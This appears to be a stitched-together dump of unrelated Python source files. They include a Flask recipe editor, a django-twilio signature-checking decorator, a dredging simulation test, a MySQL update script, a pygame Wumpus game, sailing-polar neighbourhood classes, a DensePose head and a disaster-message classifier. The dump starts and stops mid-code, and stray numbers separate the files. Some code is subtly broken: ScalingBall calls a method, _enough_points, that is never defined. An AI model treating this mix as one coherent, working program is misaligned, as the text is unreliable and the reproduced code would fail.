ingredient['ingredientID'] model.updateContain(id, ingredientID, contain['quantity'], contain['isMain'], contain['unitID'] ) return redirect(url_for('recipe', id=id)) steps = model.getStepsByRecipeID(id) image = gallery.url(recipe['image']) contains = model.getContainsByRecipeID(id) comments = model.getCommentsByRecipeID(id) averages = model.getAverageByRecipeID(id) form.recipeName.data = recipe['recipeName'] form.budget.data = recipe['budget'] form.difficulty.data = recipe['difficulty'] form.preparationTime.data = recipe['preparationTime'] form.cookingTime.data = recipe['cookingTime'] form.categoryID.data = recipe['categoryID'] form.contains.pop_entry() for contain in contains: containform = ContainForm() containform.isMain = contain['isMain'] containform.quantity = int(contain['quantity']) containform.unitID = contain['unitID'] containform.ingredientName = contain['ingredientName'] form.contains.append_entry(containform) for step in steps: form.steps.append_entry(step['stepDescription']) return render_template('editRecipe.html', form=form, ingredients=ingredients, id=id, choices=choices) return abort(404) @app.route('/recipes/delete/') @login_required def deleteRecipe(id): recipe = model.getRecipe(id) if recipe is not None: if recipe['userID'] == int(current_user.get_id()): if model.deleteRecipe(id) : flash(u'La recette {} a bien été supprimée.'.format(recipe['recipeName'])) else: flash(u"La recette {} n'a pas pu être supprimée.".format(recipe['recipeName'])) return redirect(url_for('manage')) return abort(404) # -*- coding: utf-8 -*- from __future__ import unicode_literals, absolute_import """ Useful decorators. """ from functools import wraps from django.conf import settings from django.views.decorators.csrf import csrf_exempt from django.http import ( HttpRequest, HttpResponse, HttpResponseForbidden, HttpResponseNotAllowed) from django.utils.six import text_type from twilio.twiml import TwiML as Verb from twilio.request_validator import RequestValidator from .settings import TWILIO_AUTH_TOKEN from .utils import get_blacklisted_response def twilio_view(f): """ This decorator provides several helpful shortcuts for writing Twilio views. - It ensures that only requests from Twilio are passed through. This helps protect you from forged requests. - It ensures your view is exempt from CSRF checks via Django's @csrf_exempt decorator. This is necessary for any view that accepts POST requests from outside the local domain (eg: Twilio's servers). - It enforces the blacklist. If you've got any ``Caller``s who are blacklisted, any requests from them will be rejected. - It allows your view to (optionally) return TwiML to pass back to Twilio's servers instead of building an ``HttpResponse`` object manually. - It allows your view to (optionally) return any ``twilio.Verb`` object instead of building a ``HttpResponse`` object manually. .. note:: The forgery protection checks ONLY happen if ``settings.DEBUG = False`` (aka, your site is in production). Usage:: from twilio import twiml @twilio_view def my_view(request): r = twiml.Response() r.message('Thanks for the SMS message!') return r """ @csrf_exempt @wraps(f) def decorator(request_or_self, *args, **kwargs): # When using `method_decorator` on class methods, # I haven't been able to get any class views. # i would like more research before just taking the check out. class_based_view = not isinstance(request_or_self, HttpRequest) if not class_based_view: request = request_or_self else: assert len(args) >= 1 request = args[0] # Turn off Twilio authentication when explicitly requested, or # in debug mode. Otherwise things do not work properly. For # more information, see the docs. use_forgery_protection = getattr( settings, 'DJANGO_TWILIO_FORGERY_PROTECTION', not settings.DEBUG, ) if use_forgery_protection: if request.method not in ['GET', 'POST']: return HttpResponseNotAllowed(request.method) # Forgery check try: validator = RequestValidator(TWILIO_AUTH_TOKEN) url = request.build_absolute_uri() signature = request.META['HTTP_X_TWILIO_SIGNATURE'] except (AttributeError, KeyError): return HttpResponseForbidden() if request.method == 'POST': if not validator.validate(url, request.POST, signature): return HttpResponseForbidden() if request.method == 'GET': if not validator.validate(url, request.GET, signature): return HttpResponseForbidden() # Blacklist check, by default is true check_blacklist = getattr( settings, 'DJANGO_TWILIO_BLACKLIST_CHECK', True ) if check_blacklist: blacklisted_resp = get_blacklisted_response(request) if blacklisted_resp: return blacklisted_resp response = f(request_or_self, *args, **kwargs) if isinstance(response, (text_type, bytes)): return HttpResponse(response, content_type='application/xml') elif isinstance(response, Verb): return HttpResponse(str(response), content_type='application/xml') else: return response return decorator 0 """Test application for the weather plugin.""" import datetime from pathlib import Path import numpy as np import pandas as pd import shapely.geometry import simpy import openclsim.core as core import openclsim.model as model import openclsim.plugins as plugin from .test_utils import assert_log def test_weather(): """Test function for weather plugin.""" simulation_start = datetime.datetime(2009, 1, 1) my_env = simpy.Environment(initial_time=simulation_start.timestamp()) registry = {} Site = type( "Site", ( core.Identifiable, core.Log, core.Locatable, core.HasContainer, core.HasResource, ), {}, ) TransportProcessingResource = type( "TransportProcessingResource", ( core.Identifiable, core.Log, core.ContainerDependentMovable, core.Processor, core.HasResource, ), {}, ) TestMoveActivity = type( "TestMoveActivity", ( plugin.HasWeatherPluginActivity, model.MoveActivity, # the order is critical! ), {}, ) TestShiftActivity = type( "TestShiftActivity", ( plugin.HasWeatherPluginActivity, model.ShiftAmountActivity, # the order is critical! ), {}, ) location_from_site = shapely.geometry.Point(4.18055556, 52.18664444) # lon, lat location_to_site = shapely.geometry.Point(4.25222222, 52.11428333) # lon, lat from_site = Site( env=my_env, name="Winlocatie", geometry=location_from_site, capacity=120, level=120, ) to_site = Site( env=my_env, name="Dumplocatie", geometry=location_to_site, capacity=120, level=0, ) hopper = TransportProcessingResource( env=my_env, name="Hopper 01", geometry=location_from_site, capacity=4, compute_v=lambda x: 10, ) parent = Path(__file__).resolve().parent metocean_df = pd.read_csv(parent / "data" / "unit_test_weather.csv") metocean_df = metocean_df.set_index( pd.to_datetime(metocean_df["Time"], dayfirst=True) ) metocean_df = metocean_df.sort_index() metocean_df["Hs [m]"] = ( 4 + 1.5 * np.sin(metocean_df[" Hour"] / 24 * 8 * np.pi) + 1.5 * np.sin(metocean_df[" Hour"] / 24 * 6 * np.pi) ) metocean_df = metocean_df.set_index( pd.to_datetime(metocean_df["Time"], dayfirst=True) ) metocean_df = metocean_df.sort_index() metocean_df["ts"] = metocean_df.index.values.astype(float) / 1_000_000_000 sailing_crit = plugin.WeatherCriterion( name="sailing_crit", condition="Hs [m]", maximum=6, window_length=3600, ) loading_crit = plugin.WeatherCriterion( name="loading_crit", condition="Hs [m]", maximum=4.5, window_length=3600, ) single_run = [ TestMoveActivity( env=my_env, name="sailing empty", registry=registry, mover=hopper, destination=from_site, metocean_criteria=sailing_crit, metocean_df=metocean_df, ), TestShiftActivity( env=my_env, name="Loading", registry=registry, processor=hopper, origin=from_site, destination=hopper, amount=4, duration=3600, metocean_criteria=loading_crit, metocean_df=metocean_df, ), TestMoveActivity( env=my_env, name="sailing full", registry=registry, mover=hopper, destination=to_site, metocean_criteria=sailing_crit, metocean_df=metocean_df, ), TestShiftActivity( env=my_env, name="unloading", registry=registry, processor=hopper, origin=hopper, destination=to_site, amount=4, duration=3600, metocean_criteria=loading_crit, metocean_df=metocean_df, ), ] activity = model.SequentialActivity( env=my_env, name="Single run process", ID="6dbbbdf7-4589-11e9-bf3b-b469212bff60", registry=registry, sub_processes=single_run, ) while_activity = model.WhileActivity( env=my_env, name="while", registry=registry, sub_processes=[activity], condition_event=[{"type": "container", "concept": to_site, "state": "full"}], ) model.register_processes([while_activity]) my_env.run() assert my_env.now == 1262737885.6491823 assert_log(hopper) assert_log(while_activity) 0 from django.contrib import admin from django.urls import path, include from rest_framework.routers import DefaultRouter from rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView import mainapp.views as mainapp from mainapp.views import PurchasesViewSet, ProductViewSet, CategoryViewSet, UserProfileViewSet from authapp.views import RegisterViewSet router = DefaultRouter() router.register('purchases', PurchasesViewSet) router.register('products', ProductViewSet) router.register('category', CategoryViewSet) router.register('users', UserProfileViewSet) router.register('register', RegisterViewSet) urlpatterns = [ path('api/v1/', include(router.urls)), path('api/v1/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'), path('api/v1/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'), path('product/', mainapp.ProductList.as_view()), path('category/', mainapp.CategoryList.as_view()), path('purchases/', mainapp.PurchasesList.as_view()), path('admin/', admin.site.urls), ] from django.apps import AppConfig class BlockchainConfig(AppConfig): name = 'Blockchain' rubens233/cocid_pythonModulo_2/semana4/base_datos/actualiza.py import mysql.connector try: connection = mysql.connector.connect(host='proweb-corp.com', database='prowebco_cocid', user='prowebco_alumnos_cocid', password='') cursor = connection.cursor() print("Antes de actualizar el registro ") sql_select_query = """select * from persona where id = 1""" cursor.execute(sql_select_query) record = cursor.fetchone() print(record) # Update single record now sql_update_query = """Update persona set nombre = 'cambio' where id = 1""" cursor.execute(sql_update_query) connection.commit() print("Actualizacion de registro satisfactorio") print("Despues de la actualizacion de registro") cursor.execute(sql_select_query) record = cursor.fetchone() print(record) except mysql.connector.Error as error: print("Fallo la actualizacion del registro: {}".format(error)) finally: if connection.is_connected(): connection.close() print("MySQL conexion cerrada") import os import pygame from gpath import * from screens import GameScreen from states import * from cores.tile_manager import * from cores.layout.parser import Parser from cores.kb_solve.kb import KB from cores.kb_solve.glu_agent import * class PlayGameScreen(GameScreen): loaded_map = None tile_manager = None def __init__(self, state): GameScreen.__init__(self, state=state) print("Created Game Screen") p = Parser() self.loaded_map = p.load_wumpus_env(gpath.PATH_MAP + 'map_10_10.txt') self.tile_manager = TileManager(self.loaded_map) print("ok") def update(self): self.tile_manager.update_step() def render(self, window): window.fill((0, 0, 0)) self.tile_manager.render_all_ui(window) text_point = self.title_font.render( "Score: " + str(self.tile_manager.glu_agent.score), True, (100, 0, 0)) gold = self.title_font.render( "Gold: " + str(len(self.tile_manager.glu_agent.gold_list)), True, (100, 0, 0)) step = self.title_font.render( "Step: " + str(len(self.tile_manager.log_ui_pos)), True, (200, 0, 0)) safe_nodes = self.title_font.render( "Safe: " + str(len(self.tile_manager.glu_agent.kb.safe_nodes)), True, (200, 0, 0)) window.blit(text_point, (640, 0)) window.blit(gold, (640, 100)) window.blit(step, (640, 200)) window.blit(safe_nodes, (640, 300)) pygame.time.wait(100) def clear(self): pass #!/bin/python import sympy # \int \int_{\sum} \vec{\nabla} \times \vec{F} \dot d\sum = \oint_{\partial \sum} \vec{F}\dot d\vec{r} # http://docs.sympy.org/0.7.3/tutorial/calculus.html#integrals x = sympy.Symbol('x') sympy.integrate(x,x) == sympy.integrate(x,x) examples/drop.py #!/usr/bin/env python import time from random import randint import unicornhat as unicorn print("""Drop Creates a virtual bucket and fills it with randomly coloured dots. If you're using a Unicorn HAT and only half the screen lights up, edit this example and change 'unicorn.AUTO' to 'unicorn.HAT' below. """) unicorn.set_layout(unicorn.AUTO) unicorn.rotation(0) unicorn.brightness(0.5) uh_width,uh_height=unicorn.get_shape() heights = [] def setup(): global heights heights = [] for b in range(0, (uh_width-2)): heights.append(0) unicorn.off() for b in range(0, uh_height): unicorn.set_pixel(0, b, 255, 255, 255) for b in range(0, uh_height): unicorn.set_pixel((uh_width-1), b, 255, 255, 255) for b in range(1, (uh_width-1)): unicorn.set_pixel(b, 0, 255, 255, 255) unicorn.show() def drop_ball(): ball_colour = [randint(100, 255), randint(100, 255), randint(100, 255)] ball_column = randint(0, (uh_width-3)) while heights[ball_column] == (uh_height-1): ball_column = randint(0, (uh_width-3)) height = heights[ball_column] ball_y = (uh_height-1) unicorn.set_pixel(ball_column + 1, ball_y, ball_colour[0], ball_colour[1], ball_colour[2]) unicorn.show() dropcount = (uh_height-2) - height for y in range(0, dropcount): unicorn.set_pixel(ball_column + 1, ball_y, 0, 0, 0) ball_y -= 1 unicorn.set_pixel(ball_column + 1, ball_y, ball_colour[0], ball_colour[1], ball_colour[2]) unicorn.show() time.sleep(0.02) heights[ball_column] += 1 setup() while True: for i in range(0, (uh_width-2)*(uh_height-1)): drop_ball() time.sleep(1) setup() 1-10 class Comic: def __init__(self, num: int, title: str, alt: str, img: str) -> None: self.num = num self.title = title self.alt = alt self.img = img """ Classes used to model various geometric shapes centered around the origin Defines the Neighbourhood Abstract Base Class that can be used to create custom geometric shapes Subclasses of Neighbourhood can be used with the TableExtension and the PointcloudExtension class in the hrosailing.pipeline module """ from abc import ABC, abstractmethod from typing import Callable import numpy as np from scipy.spatial import ConvexHull from ._utils import scaled_euclidean_norm class NeighbourhoodInitializationException(Exception): """Exception raised if an error occurs during initialization of a Neighbourhood """ class Neighbourhood(ABC): """Base class for all neighbourhood classes Abstract Methods ---------------- is_contained_in(self, pts) """ @abstractmethod def is_contained_in(self, pts): """This method should be used, given certain points, to determine which of these points lie in the neighbourhood and which do not, by producing a boolean array of the same size as pts """ class Ball(Neighbourhood): """A class to describe a closed 2-dimensional ball centered around the origin, ie { x in R^2 : ||x|| <= r } Parameters ---------- norm : function or callable, optional The norm for which the ball is described, ie ||.|| If nothing is passed, it will default to a scaled version of ||.||_2 radius : positive int or float, optional The radius of the ball, ie r Defaults to `0.05` Raises ------ NeighbourhoodInitializationException If radius is nonpositive """ def __init__( self, norm: Callable = scaled_euclidean_norm, radius=0.05, ): if radius <= 0: raise NeighbourhoodInitializationException( "`radius` is not positive" ) self._norm = norm self._radius = radius def __repr__(self): return f"Ball(norm={self._norm.__name__}, radius={self._radius})" def is_contained_in(self, pts): """Checks given points for membership. Parameters ---------- pts : array_like of shape (n, 2) Points that will be checked for membership Returns ------- mask : numpy.ndarray of shape (n, ) Boolean array describing which of the input points is a member of the neighbourhood """ pts = np.asarray(pts) return self._norm(pts) <= self._radius class ScalingBall(Neighbourhood): """A class to represent a closed 2-dimensional ball centered around the origin, ie { x in R^2 : ||x|| <= r }, where the radius r will be dynamically determined, such that there are always a certain amount of given points contained in the ball Parameters ---------- min_pts : positive int The minimal amount of certain given points that should be contained in the scaling ball max_pts : positive int The "maximal" amount of certain given points that should be contained in the scaling ball. Mostly used for initial guess of a "good" radius. Also to guarantee that on average, the scaling ball will contain (min_pts + max_pts) / 2 points of certain given points It is also unlikely that the scaling ball will contain more than max_pts points norm : function or callable, optional The norm for which the scaling ball is described, ie ||.|| If nothing is passed, it will default to a scaled version of ||.||_2 Raises ------ NeighbourhoodInitializationException - If min_pts or max_pts are nonpositive - If max_pts is less than or equal to min_pts """ def __init__( self, min_pts, max_pts, norm: Callable = scaled_euclidean_norm, ): if min_pts <= 0: raise NeighbourhoodInitializationException( "`min_pts` is not positive" ) if max_pts <= 0: raise NeighbourhoodInitializationException( "`max_pts` is not positive" ) if max_pts <= min_pts: raise NeighbourhoodInitializationException( "`max_pts` is smaller than `min_pts`" ) self._min_pts = min_pts self._max_pts = max_pts self._norm = norm self._avg = (min_pts + max_pts) / 2 self._n_pts = None self._area = None self._radius = None def __repr__(self): return f"ScalingBall(min_pts={self._min_pts}, max_pts={self._max_pts})" def is_contained_in(self, pts): """Checks given points for membership, and scales ball so that at least min_pts points are contained in it Parameters ---------- pts : array_like of shape (n, 2) Points that will be checked for membership Returns ------- points_in_ball : boolean numpy.ndarray of shape (n, ) Boolean array describing which of the input points is a member of the neighbourhood """ pts = np.asarray(pts) self._guess_initial_suitable_radius(pts) dist = self._norm(pts) while True: in_ball = dist <= self._radius if self._enough_points(in_ball): return in_ball self._expand_radius(dist, in_ball) def _guess_initial_suitable_radius(self, pts): self._n_pts = pts.shape[0] self._area = ConvexHull(pts).volume self._radius = np.sqrt(self._avg * self._area / (np.pi * self._n_pts)) def _enough_points_in_ball(self, pts_in_ball): return self._min_pts <= len(pts_in_ball[pts_in_ball]) def _expand_radius(self, dist, pts_in_ball): dist_of_not_included_pts = dist[~pts_in_ball] self._radius = np.min(dist_of_not_included_pts) class Ellipsoid(Neighbourhood): """A class to represent a closed d-dimensional ellipsoid centered around the origin, ie T(B), where T is an invertible linear transformation, and B is a closed d-dimensional ball, centered around the origin. It will be represented using the equivalent formulation: { x in R^2 : ||T^-1 x|| <= r } Parameters ---------- lin_trans: array_like of shape (2,2), optional The linear transformation which transforms the ball into the given ellipsoid, ie T If nothing is passed, it will default to I_2, the 2x2 unit matrix, ie the ellipsoid will be a ball norm : function or callable, optional The norm for which the ellipsoid is described, ie ||.|| If nothing is passed, it will default to a scaled version of ||.||_2 radius : positive int or float, optional The radius of the ellipsoid, ie r Defaults to 0.05 Raises ------ NeighbourhoodInitializationException - If radius is nonpositive - If lin_trans is not a (2,2)-array or is not invertible """ def __init__( self, lin_trans=None, norm: Callable = scaled_euclidean_norm, radius=0.05, ): if lin_trans is None: lin_trans = np.eye(2) lin_trans = np.asarray_chkfinite(lin_trans) if lin_trans.shape != (2, 2): raise NeighbourhoodInitializationException( "`lin_trans` has incorrect shape" ) if not np.linalg.det(lin_trans): raise NeighbourhoodInitializationException( "`lin_trans` is singular" ) if radius <= 0: raise NeighbourhoodInitializationException( "`radius` is not positive" ) self._T = np.linalg.inv(lin_trans) self._norm = norm self._radius = radius def __repr__(self): return ( f"Ellipsoid(lin_trans={self._T}, " f"norm={self._norm.__name__}, radius={self._radius})" ) def is_contained_in(self, pts): """Checks given points for membership. Parameters ---------- pts : array_like of shape (n, 2) Points that will be checked for membership Returns ------- mask : numpy.ndarray of shape (n, ) Boolean array describing which of the input points is a member of the neighbourhood """ pts = np.asarray(pts) pts = self._transform_ellipsoid_to_ball(pts) return self._norm(pts) <= self._radius def _transform_ellipsoid_to_ball(self, pts): return (self._T @ pts.T).T class Cuboid(Neighbourhood): """A class to represent a d-dimensional closed cuboid, ie { x in R^2 : |x_i| <= b_i, i=1,2 } Parameters ---------- norm : function or callable, optional The 1-d norm used to measure the length of the x_i, ie |.| If nothing is passed, it will default to the absolute value |.| dimensions: subscriptable of length 2, optional The 'length' of the 'sides' of the cuboid, ie the b_i If nothing is passed, it will default to (0.05, 0.05) """ def __init__( self, norm: Callable = scaled_euclidean_norm, dimensions=(0.05, 0.05), ): self._norm = norm self._size = dimensions def __repr__(self): return f"Cuboid(norm={self._norm.__name__}, dimensions={self._size})" def is_contained_in(self, pts): """Checks given points for membership. Parameters ---------- pts : array_like of shape (n, 2) Points that will be checked for membership Returns ------- mask : numpy.ndarray of shape (n, ) Boolean array describing which of the input points is a member of the neighbourhood """ mask = ( np.ones((pts.shape[0],), dtype=bool) & (self._norm(pts[:, 0]) <= self._size[0]) & (self._norm(pts[:, 1]) <= self._size[1]) ) return mask class Polytope(Neighbourhood): """A class to represent a general 2-dimensional polytope, ie the convex hull P = conv(x_1, ..., x_n) of some n points x_1 ,..., x_n or equivalent as the (bounded) intersection of m half spaces P = { x in R^2 : Ax <= b } Parameters ---------- mat: array_like of shape (m, 2), optional matrix to represent the normal vectors a_i of the half spaces, ie A = (a_1, ... , a_m)^t If nothing is passed, it will default to (I_2, -I_2)^t, where I_d is the d-dimensional unit matrix b: array_like of shape (m, ), optional vector to represent the ... b_i of the half spaces, ie b = (b_1, ... , b_m)^t If nothing is passed, it will default to (0.05,...,0.05) Raises ------ NeighbourhoodException If mat and b are not of matching shape Warning ------- Does not check wether the polytope given by mat and b is a polytope, ie if P is actually bounded """ def __init__( self, mat=np.row_stack((np.eye(2), -np.eye(2))), b=0.05 * np.ones(4) ): # NaN's or infinite values can't be handled mat = np.asarray_chkfinite(mat) b = np.asarray_chkfinite(b) if mat.ndim != 2 or mat.shape[1] != 2: raise NeighbourhoodInitializationException( "`mat` has incorrect shape" ) if b.ndim != 1 or b.shape[0] != mat.shape[0]: raise NeighbourhoodInitializationException( "`b` has incorrect shape" ) self._mat = mat self._b = b def __repr__(self): return f"Polytope(mat={self._mat}, b={self._b})" def is_contained_in(self, pts): """Checks given points for membership. Parameters ---------- pts : array_like of shape (n, 2) Points that will be checked for membership Returns ------- mask : numpy.ndarray of shape (n, ) Boolean array describing which of the input points is a member of the neighbourhood """ pts = np.asarray(pts) mask = np.ones((pts.shape[0],), dtype=bool) for ineq, bound in zip(self._mat, self._b): mask = mask & (ineq @ pts.T <= bound) return mask from pathlib import Path TOXINI_FILE = Path("tox.ini") PYPROJECTTOML_FILE = Path("pyproject.toml") GLOBAL_DISABLES = { "invalid-name", "fixme", "bad-continuation", "no-else-raise", "no-else-return", "no-member", } # Parse ./tox.ini tox_lines = TOXINI_FILE.read_text().splitlines() tox_pylint_lines = [ l for l in tox_lines if l.strip().startswith("pylint") and "--disable" in l ] tox_disables = {i for l in tox_pylint_lines for i in l.split('"')[1].split(",")} # Parse ./pyproject.toml pyproject_lines = PYPROJECTTOML_FILE.read_text().splitlines() is_in_disable_string = False pyproject_disables = set() for line in pyproject_lines: if is_in_disable_string and line.startswith('"""'): is_in_disable_string = False if is_in_disable_string and line: pyproject_disables.add(line.strip().strip(",")) if line.startswith("disable"): is_in_disable_string = True # Check correctness and raise errors try: in_pyproject_butnot_tox = pyproject_disables.difference(tox_disables).difference( GLOBAL_DISABLES ) assert not in_pyproject_butnot_tox except AssertionError: raise Exception( f""" The following pylint messages seem to be disabled in `./pyproject.toml`, but not in any of the pylint calls in `./tox.ini`: {in_pyproject_butnot_tox}. This could have two reasons with different solutions: 1. You fixed one or many pylint errors in one of the modules and there is no module left that needs this specific message disabled. Then, please also remove it from the `./pyproject.toml` file such that pylint uses the most up-to-date configuration file. 2. You added a new global exception to `./pyproject.toml` after deciding that this is a message that we do not want to enforce anywhere currently. Then, please add this exception also to the `GLOBAL_DISABLES` variable in this this python script (`./github/workflows/pylint_check.py`). If you are not sure what exactly you are supposed to do, or if you think that this message is wrong please feel free to ping @nathanaelbosch. """ ) try: in_tox_butnot_pyproject = tox_disables.difference(pyproject_disables) assert not in_tox_butnot_pyproject except AssertionError: raise Exception( f""" The following pylint messages seem to be disabled in `./tox.ini`, but not in `./pyproject.toml`: {in_tox_butnot_pyproject}. Please make sure to add them to `./pyproject.toml` such that pylint does not raise any warnings that are not supposed to be fixed right now. If you are not sure what exactly you are supposed to do, or if you think that this message is wrong please feel free to ping @nathanaelbosch. """ ) print( "The pylint exceptions in `./tox.ini` and `./pyproject.toml` seem to be correctly synchronized." ) from cmd3.shell import command from cmd3.console import Console import os import sys class clear: # # CLEAR # def activate_clear(self): """activates the clear command""" pass @command def do_clear(self, arg, arguments): """ Usage: clear Clears the screen.""" sys.stdout.write(os.popen('clear').read()) @command def do_banner(self, arg, arguments): """ :: Usage: banner [-c CHAR] [-n WIDTH] [-i INDENT] [-r COLOR] TEXT Arguments: TEXT The text message from which to create the banner CHAR The character for the frame. WIDTH Width of the banner INDENT indentation of the banner COLOR the color Options: -c CHAR The character for the frame. [default: #] -n WIDTH The width of the banner. [default: 70] -i INDENT The width of the banner. [default: 0] -r COLOR The color of the banner. [default: BLACK] Prints a banner form a one line text message. """ print arguments n = int(arguments['-n']) c = arguments['-c'] i = int(arguments['-i']) color = arguments['-r'].upper() Console._print(color, "", i * " " + (n-i) * c) Console._print(color, "", i * " " + c + " " + arguments['TEXT']) Console._print(color, "", i * " " + (n-i) * c) # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved import torch from torch import nn from detectron2.config import CfgNode from detectron2.layers import ConvTranspose2d, interpolate from ...structures import DensePoseEmbeddingPredictorOutput from ..utils import initialize_module_params from .registry import DENSEPOSE_PREDICTOR_REGISTRY @DENSEPOSE_PREDICTOR_REGISTRY.register() class DensePoseEmbeddingPredictor(nn.Module): """ Last layers of a DensePose model that take DensePose head outputs as an input and produce model outputs for continuous surface embeddings (CSE). """ def __init__(self, cfg: CfgNode, input_channels: int): """ Initialize predictor using configuration options Args: cfg (CfgNode): configuration options input_channels (int): input tensor size along the channel dimension """ super().__init__() dim_in = input_channels n_segm_chan = cfg.MODEL.ROI_DENSEPOSE_HEAD.NUM_COARSE_SEGM_CHANNELS embed_size = cfg.MODEL.ROI_DENSEPOSE_HEAD.CSE.EMBED_SIZE kernel_size = cfg.MODEL.ROI_DENSEPOSE_HEAD.DECONV_KERNEL # coarse segmentation self.coarse_segm_lowres = ConvTranspose2d( dim_in, n_segm_chan, kernel_size, stride=2, padding=int(kernel_size / 2 - 1) ) # embedding self.embed_lowres = ConvTranspose2d( dim_in, embed_size, kernel_size, stride=2, padding=int(kernel_size / 2 - 1) ) self.scale_factor = cfg.MODEL.ROI_DENSEPOSE_HEAD.UP_SCALE initialize_module_params(self) def interp2d(self, tensor_nchw: torch.Tensor): """ Bilinear interpolation method to be used for upscaling Args: tensor_nchw (tensor): tensor of shape (N, C, H, W) Return: tensor of shape (N, C, Hout, Wout), where Hout and Wout are computed by applying the scale factor to H and W """ return interpolate( tensor_nchw, scale_factor=self.scale_factor, mode="bilinear", align_corners=False ) def forward(self, head_outputs): """ Perform forward step on DensePose head outputs Args: head_outputs (tensor): DensePose head outputs, tensor of shape [N, D, H, W] """ embed_lowres = self.embed_lowres(head_outputs) coarse_segm_lowres = self.coarse_segm_lowres(head_outputs) embed = self.interp2d(embed_lowres) coarse_segm = self.interp2d(coarse_segm_lowres) return DensePoseEmbeddingPredictorOutput(embedding=embed, coarse_segm=coarse_segm) 0 # -*- coding: utf-8 -*- """ Created on Sat Apr 11 15:18:39 2020 @author: kaisa """ from sqlalchemy import create_engine import matplotlib.pyplot as plt import io import os import re import numpy as np import pandas as pd from nltk.tokenize import word_tokenize from nltk.stem import WordNetLemmatizer from nltk.corpus import stopwords from sklearn.pipeline import Pipeline from sklearn.metrics import confusion_matrix from sklearn.model_selection import train_test_split from sklearn.ensemble import RandomForestClassifier from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score from keras.preprocessing import text, sequence from keras.preprocessing.text import Tokenizer from keras.preprocessing.sequence import pad_sequences from keras.models import Sequential from keras.layers import Dense, Embedding, LSTM, SpatialDropout1D, Input, Bidirectional, GRU, Convolution1D, GlobalMaxPool1D from keras import layers from sklearn.model_selection import train_test_split from keras.utils.np_utils import to_categorical from keras.callbacks import EarlyStopping from keras.layers import Dropout from keras import layers, models, optimizers import re from nltk.corpus import stopwords from nltk import word_tokenize STOPWORDS = set(stopwords.words('english')) url_regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' def load_data(database_filename): # load data engine = create_engine('sqlite:///' + database_filename) df = pd.read_sql_table('f8_disater_response_data', engine) X = df['message'] y = df.drop(columns=['id', 'message','original','genre']) return X, y def tokenize(text): # remove urls detected_urls = re.findall(url_regex, text) for url in detected_urls: text = text.replace(url, "urlplaceholder") # Normalize text text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower()) #tokenize tokens = word_tokenize(text) # Remove stop words tokens = [w for w in tokens if w not in stopwords.words("english")] # Lemmatize lemmatizer = WordNetLemmatizer() clean_tokens = [] for tok in tokens: clean_tok = lemmatizer.lemmatize(tok).strip() clean_tokens.append(clean_tok) return ' '.join(clean_tokens) def display_results(y_test, y_pred): y_pred = pd.DataFrame(data=y_pred, columns=y_test.columns) # confusion matrix confusion_mat = np.zeros((2,2)) for c in y_test.columns: confusion_mat += confusion_matrix(y_test[c], y_pred[c]) confusion_mat = np.array(confusion_mat, dtype=np.float) / np.sum(confusion_mat) # accuracy accuracy = {c: (y_test[c]==y_pred[c]).mean() for c in y_test.columns} print("Confusion Matrix:\n", confusion_mat) print("Scores:") scores = {'f1': f1_score, 'precision': precision_score, 'recall': recall_score} for c in y_test.columns: t = '{:25}'.format(c+':') for name, score in scores.items(): try: t += '{}={:.2f} '.format(name, score(y_test[c], y_pred[c])) #, zero_division=1 except: t += 'error' pass print(t) # for c, v in accuracy.items(): # print(' {}: {:.2f}'.format(c, v)) def check_recall(y_train, y_test, y_pred): recall = [recall_score(y_test[c], y_pred[c]) for c in y_test.columns] occurance = [(np.sum(y_test[c])+np.sum(y_train[c])) / (len(y_test)+len(y_train)) for c in y_test.columns] labels = y_test.columns.tolist() labels = [x for _,x in sorted(zip(recall,labels))] occurance = [x for _,x in sorted(zip(recall,occurance))] recall.sort() return recall, occurance, labels X, y = load_data('D:\\Datensicherung\\Projekte\\Udacity_DataScience\\Disaster_response_project\\data\\database.db') #y = y[['hospitals', 'shops', 'aid_centers', 'other_infrastructure', 'fire']] X = [tokenize(text) for text in X] X_train, X_test, y_train, y_test = train_test_split(X, y) # #pipeline = Pipeline([ # ('vect', CountVectorizer(tokenizer=tokenize)), # ('tfidf', TfidfTransformer()) #]) # ## train classifier #res = pipeline.fit_transform(X_train, y_train) def load_vectors(fname): fin = io.open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore') n, d = map(int, fin.readline().split()) data = {} for line in fin: tokens = line.rstrip().split(' ') data[tokens[0]] = np.asarray(tokens[1:], dtype='float32') return data # load the pre-trained word-embedding vectors embeddings_index = {} for i, line in enumerate(open('D:\\Datensicherung\\Projekte\\Udacity_DataScience\\data\\wiki-news-300d-1M.vec')): if i!=0: values = line.split() embeddings_index[values[0]] = np.asarray(values[1:], dtype='float32') embeddings_index = load_vectors('D:\\Datensicherung\\Projekte\\Udacity_DataScience\\data\\wiki-news-300d-1M.vec') # create a tokenizer token = text.Tokenizer() token.fit_on_texts(X_train) word_index = token.word_index # convert text to sequence of tokens and pad them to ensure equal length vectors train_seq_x = sequence.pad_sequences(token.texts_to_sequences(X_train), maxlen=50) valid_seq_x = sequence.pad_sequences(token.texts_to_sequences(X_test), maxlen=50) # create token-embedding mapping embedding_matrix = np.zeros((len(word_index) + 1, 300)) for word, i in word_index.items(): embedding_vector = embeddings_index.get(word) if embedding_vector is not None: embedding_matrix[i] = embedding_vector def create_rcnn(X): model = Sequential() # Add an Input Layer #input_layer = layers.Input((70, )) #model.add(Input((X.shape[1], ))) # Add the word embedding Layer #embedding_layer = layers.Embedding(len(word_index) + 1, 300, weights=[embedding_matrix], trainable=False)(input_layer) #embedding_layer = layers.SpatialDropout1D(0.3)(embedding_layer) model.add(Embedding(len(word_index) + 1, 300, weights=[embedding_matrix], trainable=False, input_length=X.shape[1])) model.add(SpatialDropout1D(0.3)) # Add the recurrent layer #rnn_layer = layers.Bidirectional(layers.GRU(50, return_sequences=True))(embedding_layer) model.add(Bidirectional(GRU(50, return_sequences=True))) # Add the convolutional Layer #conv_layer = layers.Convolution1D(100, 3, activation="relu")(embedding_layer) model.add(Convolution1D(100, 3, activation="relu")) # Add the pooling Layer #pooling_layer = layers.GlobalMaxPool1D()(conv_layer) model.add(GlobalMaxPool1D()) # Add the output 